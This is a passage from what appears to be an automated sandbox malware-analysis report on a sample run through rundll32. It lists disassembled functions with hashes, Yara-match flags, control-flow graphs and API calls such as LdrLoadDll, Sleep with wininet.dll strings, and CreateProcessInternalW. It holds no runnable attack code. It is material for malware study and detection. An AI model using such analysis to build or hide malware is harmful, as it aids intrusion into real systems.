                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: feb6e87338e0be925bec8154b3ce62d4cd559f850b30b57bd4f51347135e16ad
                                                                                            • Instruction ID: 7ee8ff279ba22843082ee3feb441b4e07b47c946abf823f409bde6d0c94d8ce2
                                                                                            • Opcode Fuzzy Hash: feb6e87338e0be925bec8154b3ce62d4cd559f850b30b57bd4f51347135e16ad
                                                                                            • Instruction Fuzzy Hash: 619002B130141423F11165594605707000D97D0295FA1C412A4415558DA696D952B561
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04619840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 87eee430a3604ce58020a7488ea8542e6388d7312441a54035513760c0afd609
                                                                                            • Instruction ID: 4a1fc31bc8d9189e5c9cb6b13c2907745549b9b2c26ee4dd1261c5560af9d7d6
                                                                                            • Opcode Fuzzy Hash: 87eee430a3604ce58020a7488ea8542e6388d7312441a54035513760c0afd609
                                                                                            • Instruction Fuzzy Hash: 409002A1342451627545B5594505507400AA7E02957A1C012A5405950C9566E856EA61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04619540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 3094af508f201943e06c4057b299666611c6164f3a912c3dccc53d76303c9e4c
                                                                                            • Instruction ID: 7f944006919fcc09986678885896523232dca4a262e79e2f4177745da54309b0
                                                                                            • Opcode Fuzzy Hash: 3094af508f201943e06c4057b299666611c6164f3a912c3dccc53d76303c9e4c
                                                                                            • Instruction Fuzzy Hash: 9C9002A5311410132105A9590705507004A97D53A5361C021F5006550CE661D8616561
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04619910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: da164c1b461e91204ffc8664fba9ffecd9c7b8ac655dc39fa4f4406f3eb1243d
                                                                                            • Instruction ID: 4cf0b7548df0202bc14f29bea6aa503000891413c711ad18948ec261ee3772c4
                                                                                            • Opcode Fuzzy Hash: da164c1b461e91204ffc8664fba9ffecd9c7b8ac655dc39fa4f4406f3eb1243d
                                                                                            • Instruction Fuzzy Hash: A29002F130141412F14075594505746000997D0355F61C011A9055554E9699DDD57AA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 046195D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 846543f82d83d6566a8d40ca83b9551139c2e0b8a69f35f6d32591a9627dc9db
                                                                                            • Instruction ID: a305afcc707dc3c7056a0f4ba3bd81568dc77257329de74992b91cb4b67d5df6
                                                                                            • Opcode Fuzzy Hash: 846543f82d83d6566a8d40ca83b9551139c2e0b8a69f35f6d32591a9627dc9db
                                                                                            • Instruction Fuzzy Hash: E09002E130241013610575594515616400E97E0255B61C021E5005590DD565D8917565
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 046199A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 339698a1000978265b5947d2ff51519e57a3d97391fada213c6f2203f58beeec
                                                                                            • Instruction ID: 2fa0aeac254d5d14a54e8e52872c5de40c0c8758fe7be9af634a4ee78873ddf4
                                                                                            • Opcode Fuzzy Hash: 339698a1000978265b5947d2ff51519e57a3d97391fada213c6f2203f58beeec
                                                                                            • Instruction Fuzzy Hash: EB9002E134141452F10065594515B060009D7E1355F61C015E5055554D9659DC527566
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04619660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 1fafc0563fa6d03dbe266d132d79b1817c8abfbdfab736ae468f55b417a06e96
                                                                                            • Instruction ID: f9090fa1ade67e17ebee1c249b470158715d6e7c10a83f8c0513f48d010116a7
                                                                                            • Opcode Fuzzy Hash: 1fafc0563fa6d03dbe266d132d79b1817c8abfbdfab736ae468f55b417a06e96
                                                                                            • Instruction Fuzzy Hash: B49002B130141812F1807559450564A000997D1355FA1C015A4016654DDA55DA597BE1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04619650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: ec949546fc8814617df1cf3d022cdb4bdf3d30a26caca68045b6eabe8d4eab48
                                                                                            • Instruction ID: 9bfc9df670e466f7b6ca9697c3f24d17bd30cd5de8e9fbbf5953c093dc4b0993
                                                                                            • Opcode Fuzzy Hash: ec949546fc8814617df1cf3d022cdb4bdf3d30a26caca68045b6eabe8d4eab48
                                                                                            • Instruction Fuzzy Hash: DF9002B130545852F14075594505A46001997D0359F61C011A4055694DA665DD55BAA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04619A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: bf62d55eb83403f0cf174b06ed00451b03f45980687ecf1143e84131b55336a3
                                                                                            • Instruction ID: 2f75cdaa60d1fabb43a0e573fb925ff396d63a7496bb028b87224a70f151996f
                                                                                            • Opcode Fuzzy Hash: bf62d55eb83403f0cf174b06ed00451b03f45980687ecf1143e84131b55336a3
                                                                                            • Instruction Fuzzy Hash: C09002A1311C1052F20069694D15B07000997D0357F61C115A4145554CD955D8616961
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 046196E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 5500be09ceacd4fc8cf2801826aecf52fc7927c92b8b9bbe87ca61577f1daf34
                                                                                            • Instruction ID: 5e58cae27a230f08c94e55c514d8abe01410b3ee60cb4ae9950184783a91c09f
                                                                                            • Opcode Fuzzy Hash: 5500be09ceacd4fc8cf2801826aecf52fc7927c92b8b9bbe87ca61577f1daf34
                                                                                            • Instruction Fuzzy Hash: 8A9002B130149812F1106559850574A000997D0355F65C411A8415658D96D5D8917561
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 046196D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 82d39e9c8afc4800deb19cd3f6dc5b949f720fc1bd1cbcdd8bae9f01a11227ff
                                                                                            • Instruction ID: cc8a03b4430e2e43e85c5757e7d9423e76f96b0df5163ea1989d5bf644e8238e
                                                                                            • Opcode Fuzzy Hash: 82d39e9c8afc4800deb19cd3f6dc5b949f720fc1bd1cbcdd8bae9f01a11227ff
                                                                                            • Instruction Fuzzy Hash: B39002B130141852F10065594505B46000997E0355F61C016A4115654D9655D8517961
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04619710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 6311c207f87860e0c498b4367712e6b7dbadde8dd1af1675bee8faadca14b0b3
                                                                                            • Instruction ID: 2c307ef81d99d4ffb15f9dffd4b47a9e302ff40ecde8e9ef9b06b2b1aa00d632
                                                                                            • Opcode Fuzzy Hash: 6311c207f87860e0c498b4367712e6b7dbadde8dd1af1675bee8faadca14b0b3
                                                                                            • Instruction Fuzzy Hash: C69002B130141412F10069995509646000997E0355F61D011A9015555ED6A5D8917571
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04619FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 02b8b627417b74ea70f8307834a80d90811435a9aee855f389d6ac79a5976802
                                                                                            • Instruction ID: f075669b05b6a4dcef345c2a87d3f298795d687ed3cca40a9fbaf1866bcfaf90
                                                                                            • Opcode Fuzzy Hash: 02b8b627417b74ea70f8307834a80d90811435a9aee855f389d6ac79a5976802
                                                                                            • Instruction Fuzzy Hash: FB9002B131155412F11065598505706000997D1255F61C411A4815558D96D5D8917562
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04619780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 892eecb51f62b27e61431ebec964495a2c9e4649bc21fa325719c7e21ab62a5d
                                                                                            • Instruction ID: 2f3f16d8ed6334dd1b468854737dbb42b11e32434084aacd70a4d83235513bbf
                                                                                            • Opcode Fuzzy Hash: 892eecb51f62b27e61431ebec964495a2c9e4649bc21fa325719c7e21ab62a5d
                                                                                            • Instruction Fuzzy Hash: 829002A931341012F1807559550960A000997D1256FA1D415A4006558CD955D8696761
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025C77D0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 297 25c77d0-25c7812 call 25ca600 300 25c78ec-25c78f2 297->300 301 25c7818-25c7868 call 25ca6d0 call 25b9f70 call 25c42d0 297->301 308 25c7870-25c7881 Sleep 301->308 309 25c78e6-25c78ea 308->309 310 25c7883-25c7889 308->310 309->300 309->308 311 25c788b-25c78b1 call 25c7400 310->311 312 25c78b3-25c78d4 call 25c7600 310->312 316 25c78d9-25c78dc 311->316 312->316 316->309
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(000007D0), ref: 025C7878
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Sleep
                                                                                            • String ID: net.dll$wininet.dll
                                                                                            • API String ID: 3472027048-1269752229
                                                                                            • Opcode ID: 398156c83f2bc72fe6e6c7ef956510dc9abef3d4df3efc12ac588fa808278428
                                                                                            • Instruction ID: 3d2c9d55f907c1ca608edfd5babf21b382bcacdfb75fc991170a0fac9fb20881
                                                                                            • Opcode Fuzzy Hash: 398156c83f2bc72fe6e6c7ef956510dc9abef3d4df3efc12ac588fa808278428
                                                                                            • Instruction Fuzzy Hash: 6C31ACB6A01605AFD711DFA4C8A0FA7BBB8BF88704F10811DF65A5B640E770A445CFE4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025C77CC Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 80sleepCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 317 25c77cc-25c7812 call 25ca600 321 25c78ec-25c78f2 317->321 322 25c7818-25c7868 call 25ca6d0 call 25b9f70 call 25c42d0 317->322 329 25c7870-25c7881 Sleep 322->329 330 25c78e6-25c78ea 329->330 331 25c7883-25c7889 329->331 330->321 330->329 332 25c788b-25c78b1 call 25c7400 331->332 333 25c78b3-25c78d4 call 25c7600 331->333 337 25c78d9-25c78dc 332->337 333->337 337->330
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(000007D0), ref: 025C7878
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Sleep
                                                                                            • String ID: net.dll$wininet.dll
                                                                                            • API String ID: 3472027048-1269752229
                                                                                            • Opcode ID: e4c5fb0c2d3fddc48e076531093d3886df4d9f79e6eb119d767d896a5e528551
                                                                                            • Instruction ID: 1575a7c211ac588c68d600af1e1f37ede3de743f25fff53367042ddd8a5562cc
                                                                                            • Opcode Fuzzy Hash: e4c5fb0c2d3fddc48e076531093d3886df4d9f79e6eb119d767d896a5e528551
                                                                                            • Instruction Fuzzy Hash: 5721A9B6A05205AFD711DFA4C8A0FA7BBB8BF88714F10802DF6196B640E370A445CFE4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025B7629 Relevance: 3.1, APIs: 2, Instructions: 66threadwindowCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 338 25b7629-25b762a 339 25b762c-25b762d 338->339 340 25b75f5-25b75f8 338->340 343 25b762f-25b763f 339->343 344 25b75c4-25b75c5 339->344 341 25b75fa-25b75fc 340->341 342 25b75ae-25b75be call 25ca6a0 340->342 341->338 346 25b7648-25b767a call 25cb300 call 25b9f70 call 25c42d0 343->346 347 25b7643 call 25ca720 343->347 356 25b76ae-25b76b2 346->356 357 25b767c-25b768e PostThreadMessageW 346->357 347->346 358 25b76ad 357->358 359 25b7690-25b76ab call 25b96d0 PostThreadMessageW 357->359 358->356 359->358
                                                                                            APIs
                                                                                            • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 025B768A
                                                                                            • PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 025B76AB
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MessagePostThread
                                                                                            • String ID:
                                                                                            • API String ID: 1836367815-0
                                                                                            • Opcode ID: 549859d080381cdb36f758b433ff7c0e1cf544c8cdcfce893e8232daf66e5988
                                                                                            • Instruction ID: 907d4710be561d7c2a7b259a68caff41db4dc75385a6021cd0c9def0a087ca1d
                                                                                            • Opcode Fuzzy Hash: 549859d080381cdb36f758b433ff7c0e1cf544c8cdcfce893e8232daf66e5988
                                                                                            • Instruction Fuzzy Hash: 43110C31A4051D7BD7219994DD02FFDBB18BF84B14F240019FB04AA1C0E79469078BA8
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025B7630 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 025B768A
                                                                                            • PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 025B76AB
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MessagePostThread
                                                                                            • String ID:
                                                                                            • API String ID: 1836367815-0
                                                                                            • Opcode ID: 8623d55f06a9257694a48ae33d6b2b74889cdcaa8bb935daf2579ae60fb115c3
                                                                                            • Instruction ID: e4344797182a78780e2e52c31ab65bcf40df6e607789c1dc5c8d3410def90281
                                                                                            • Opcode Fuzzy Hash: 8623d55f06a9257694a48ae33d6b2b74889cdcaa8bb935daf2579ae60fb115c3
                                                                                            • Instruction Fuzzy Hash: 38018831A4022D7AE721AAA4DC42FFE766C6F85B50F140118FB04BA1C0E69469064AE9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025C8EC5 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 581 25c8ec5-25c8ecc 582 25c8ece-25c8ee9 581->582 583 25c8f11-25c8f3a call 25c9700 581->583 585 25c8eef-25c8f10 582->585 586 25c8eea call 25c9700 582->586 587 25c8f3f-25c8f54 LookupPrivilegeValueW 583->587 586->585
                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,025BD3F2,025BD3F2,?,00000000,?,?), ref: 025C8F50
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: bdd69fa690a9345b278c4d75b499c5649785f89297405a4a9d7b8157e93cc0de
                                                                                            • Instruction ID: 862918cb735b27686fb5483023d3c51c2922cfbe7e7768b08147c261e70802c6
                                                                                            • Opcode Fuzzy Hash: bdd69fa690a9345b278c4d75b499c5649785f89297405a4a9d7b8157e93cc0de
                                                                                            • Instruction Fuzzy Hash: 0611E0B5214144AFDB04DF98DC85DE77BA9EF89360F198A5DF88D87202C634E415CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025B9F70 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 589 25b9f70-25b9f99 call 25cb550 592 25b9f9b-25b9f9e 589->592 593 25b9f9f-25b9fad call 25cb970 589->593 596 25b9faf-25b9fba call 25cbbf0 593->596 597 25b9fbd-25b9fce call 25c9ca0 593->597 596->597 602 25b9fd0-25b9fe4 LdrLoadDll 597->602 603 25b9fe7-25b9fea 597->603 602->603
                                                                                            APIs
                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 025B9FE2
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Load
                                                                                            • String ID:
                                                                                            • API String ID: 2234796835-0
                                                                                            • Opcode ID: e50510530ad2ae1b1d579bca8e1c56ac484d5ebe242c57014b58d11bb330066c
                                                                                            • Instruction ID: ca41e8ab9f5e52e50ae042ce6eb23a5e874d68c68ce1436de0dbb12477c7c6dd
                                                                                            • Opcode Fuzzy Hash: e50510530ad2ae1b1d579bca8e1c56ac484d5ebe242c57014b58d11bb330066c
                                                                                            • Instruction Fuzzy Hash: 06010CB5D0020EABDF10DAE4DC46FDDB7B9AB44308F104199AA0897241F631EB18CB95
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 025C8E30 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 604 25c8e30-25c8e88 call 25c9700 CreateProcessInternalW
                                                                                            APIs
                                                                                            • CreateProcessInternalW.KERNELBASE(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,?,?,?,?), ref: 025C8E84
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_25b0000_rundll32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateInternalProcess
                                                                                            • String ID:
                                                                                            • API String ID: 2186235152-0
                                                                                            • Opcode ID: a2780b25c1273a915d502a9d2687447f1107aa1795783c68fbfbf60aa3e7371e
                                                                                            • Instruction ID: f6809285d05acf5062f103cc28e321d00bdc95e325e62961f6eeae57aa84d4b0
